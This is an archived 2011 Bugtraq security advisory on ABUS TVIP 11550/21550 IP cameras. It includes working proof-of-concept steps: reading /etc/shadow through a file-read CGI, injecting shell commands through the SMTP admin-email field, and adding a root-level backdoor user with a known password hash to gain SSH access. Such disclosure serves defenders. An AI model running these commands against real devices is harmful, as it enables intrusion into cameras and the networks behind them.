[<prev] [next>] [day] [month] [year] [list]
Message-ID: <54337.5353b77c.1318048665.nsm@mail.stream-portal.org>
Date: Sat, 8 Oct 2011 06:37:45 +0200 (CEST)
From: "Marco van Berkum" <marco@...eam-portal.org>
To: Bugtraq@...urityfocus.com
Subject:
ABUS TVIP 11550/21550 Multiple vulnerabilities (and possibly other ABUS cams)
Title : ABUS TVIP 11550/21550 Multiple vulnerabilities (and possibly
other ABUS cams)
Author : Marco van Berkum
- Summary
- Arbitrary file read
- Arbitrary file upload
- Arbitrary command excution (input validation bug)
- How it's totally compromised including ssh root login.
- Summary
The ABUS 11550 and 21550 are IP Webcams that can be configured via a
webinterface.
While experimenting multiple vulnerabilities where discovered that give
rootaccess
to the Operating System, debian-linux, of the camera. The webserver of the
camera is
BOA and runs as root.
Although these vulnerabilities can ONLY be exploited when logged in as
admin, they
can still be considered critical since the camera can be used to gain
access to the
network behind it. I did not find a way past the login screen without
proper credentials (yet).
- Arbitrary file read
When logged in as admin its possible to read any file on the filesystem since
the webserver is running as root.
http://ipcamera/cgi-bin/admin/fileread?READ.filePath=/etc/shadow
- Arbitrary file upload
Similar to the fileread CGI there also is a filewrite CGI that can
(over)write any
file.
http://ipcamera/cgi-bin/admin/filewrite?SAVE.filePath=/tmp/file%26SAVE
- Arbitrary command execution (input validation bug)
The camera has several htmlforms to configure services such as a FTPclient
and
a SMTPclient. These are used to notify users and upload videos when the
camera's motion detection detects movement. These htmlforms can be used to
execute
arbitrary commands as root. I've found bugs in the SMTP and FTP forms but
probably
other forms will contain the same bug (unchecked).
Exploit:
In the configuration -> smtp general part is a webform where an
administrator's
emailadress can be filled out (Administrator e-Mail address).
The form lacks checking metacharacters such as ;, | and `.
When a test email from this form is sent the webinterface executes ssmtp -t
<your_input>.
So it is possible to 'break' the commandline by using `ls` for instance.
After
submitting
the command via the 'testbutton' this will be the output:
smtp: Connect to host
smtp: MAIL FROM:<backup>
SMTP server error
................SMTP Test Failed...........
Which means we are situated in a directory that contains a backup directory.
`pwd` also works
smtp: Connect to host
smtp: MAIL FROM:</opt/cgi/admin>
SMTP server error
................SMTP Test Failed...........
Unfortunately this only outputs the first line of the commandline output.
But, we can work around this :)
The system also contains a System Log function that shows output of the
systemlog.
Now, if we want a little more output than just the first line, for instance
"ls /" we can do it by filling out `ls /|logger` which sends the output
to the system logfile. Which can then be viewed from the webinterface.
Oct 8 14:35:15 <notice > root: bin
Oct 8 14:35:15 <notice > root: dev
Oct 8 14:35:15 <notice > root: etc
Oct 8 14:35:15 <notice > root: include
Oct 8 14:35:15 <notice > root: init
Oct 8 14:35:15 <notice > root: lib
Oct 8 14:35:15 <notice > root: linuxrc
Oct 8 14:35:15 <notice > root: mnt
Oct 8 14:35:15 <notice > root: opt
Oct 8 14:35:15 <notice > root: proc
Oct 8 14:35:15 <notice > root: root
Oct 8 14:35:15 <notice > root: sbin
Oct 8 14:35:15 <notice > root: smtp_test.sh
Oct 8 14:35:15 <notice > root: sys
Oct 8 14:35:15 <notice > root: tag_replace.sh
Oct 8 14:35:15 <notice > root: tmp
Oct 8 14:35:15 <notice > root: usr
Oct 8 14:35:15 <notice > root: var
Oct 8 14:35:15 <notice > root: web
Getting the correct commandline output can also be obtained by redirecting
it to a readble file on de webserver itself by doing `ls -alR
/>/web/html/lsoutput.txt`
It can then be accessed by the url http://ipcamera/lsoutput.txt
- How it's totally compromised including ssh root login.
I did it in a few steps. First did a `ls -alR/>/web/html/lsoutput.txt` to
see what was on the filesystem and noticed that dropbear is available on the
system. Dropbear is a SSHserver/Client :)
So, I started it with the `/etc/dropbear/dropbear` command.
Then I took a look at the /etc/shadowfile and noticed that user root had
no password,
so ssh'ing in was not an option, yet. So had to create a user, did it the
following way:
`echo "test:x:0:0:test:/tmp:/bin/sh">>/etc/passwd`
and
`echo
"test:$1$/DqZS5Cm$PUeCTPpYIrGQnxsZtsfDY1:12963:0:99999:7:::">>/etc/shadow`
So, now we can login as user test with password test. User test has UID 0,
thus root.
test@...amera's password:
Welcome to
_____ __ ___ __ ___ _ _ _
| ___| / \ / __ \ / \ | _ \ / \ \ \ / /
| |___ / /\ \ | /__\ \ / /\ \ | | \ | / /\ \ \ V /
| ___|| |__| | | _ / | |__| | | | | | | |__| | \ /
| | | __ | | | \ \ | __ | | |_/ / | __ | | |
|_| |_| |_| |_| \_\|_| |_| |___ / |_| |_| |_|
For further information check:
http://www.GM.com/
BusyBox v1.1.3 (2010.05.10-11:54+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
[test]#
Voila ;)
Also, its possible to mount a samba or nfsshare via the webinterface and
copy files
that way.
Just my two cents
Marco van berkum
Powered by blists - more mailing lists